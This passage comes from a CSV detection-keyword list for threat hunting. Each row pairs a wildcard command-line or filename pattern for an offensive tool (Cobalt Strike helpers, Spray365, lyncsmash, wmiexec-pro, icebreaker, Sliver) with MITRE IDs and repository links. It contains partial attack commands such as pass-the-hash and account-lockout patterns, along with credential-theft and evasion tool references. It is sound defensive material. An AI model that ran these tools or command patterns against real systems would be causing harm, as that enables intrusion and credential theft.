is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,0,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*.py lock -H * -u administrator -d *,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,0,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*.py -method BOTH -dc-ip *,offensive_tool_keyword,LdapRelayScan,Check for LDAP protections regarding the relay of NTLM authentication,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/zyn3rgy/LdapRelayScan,1,0,N/A,8,4,389,51,2023-09-04T05:43:00Z,2022-01-16T06:50:44Z -*.py -method LDAPS -dc-ip *,offensive_tool_keyword,LdapRelayScan,Check for LDAP protections regarding the relay of NTLM authentication,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/zyn3rgy/LdapRelayScan,1,0,N/A,8,4,389,51,2023-09-04T05:43:00Z,2022-01-16T06:50:44Z -*.py --server amsi --file *.exe*,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,0,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*.py spray -ep *,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,0,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -*.py --zip -c All -d * -u * --hashes 'ffffffffffffffffffffffffffffffff':* -dc *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with 
hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*.py* --payload *.ps1*,offensive_tool_keyword,cobaltstrike,A simple python packer to easily bypass Windows Defender,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Unknow101/FuckThatPacker,1,0,N/A,10,10,612,91,2022-04-03T18:20:01Z,2020-08-13T07:26:07Z -*.py* service -action create -service-name *,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*.py* -service-name * -hashes *,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on 
ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,0,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*.py*found-users.txt*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*.rclone.exe config*,greyware_tool_keyword,rclone,rclone abused by threat actors for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://github.com/rclone/rclone,1,0,N/A,6,10,40569,3714,2023-10-03T18:57:28Z,2014-03-16T16:19:57Z -*.resources.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.rtf.bat*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.rtf.dll*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.rtf.exe*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.rtf.htm*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.rtf.jar*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.rtf.js*,offensive_tool_keyword,_,Suspicious extensions 
files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.rtf.sfx*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.rtf.vbs*,offensive_tool_keyword,_,Suspicious extensions files,T1204 - T1212 - T1562,TA0001 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*.sccmhunter*,offensive_tool_keyword,sccmhunter,SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain,T1087 - T1046 - T1484,TA0003 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/garrettfoster13/sccmhunter,1,0,N/A,9,4,344,38,2023-08-25T06:17:23Z,2023-02-20T14:09:42Z -*.search.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.secure.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.sh *--checksec*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*.sh *cvelist-file:*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege 
Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*.sharpgen *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,0,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*.ShellcodeRDI*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*.sites.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.SliverRPC/*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*.smtp.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 
- T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.ssl.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.stage.123456.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*.stage.123456.*,offensive_tool_keyword,cobaltstrike,dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,dns query field,10,10,N/A,N/A,N/A,N/A -*.static.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.status.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 
- T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.store.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik 
Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.striker.local*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*.support.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
